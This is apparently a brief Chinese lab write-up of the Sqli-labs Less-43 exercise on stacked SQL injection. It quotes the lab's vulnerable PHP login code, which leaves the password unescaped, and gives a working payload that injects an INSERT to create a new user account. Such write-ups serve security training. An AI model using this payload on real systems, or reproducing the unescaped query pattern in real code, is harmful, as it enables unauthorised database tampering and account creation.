Sqli-labs Less-43 堆叠注入

本关与42关的原理基本一致，我们还是定位在login.php中的password。关键代码：

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

登录：username：admin

Password：c');insert into users(id,username,password) values('43','less43','hello')#

可以看到成功创建了一个新用户。

其他的操作这里就不进行演示了。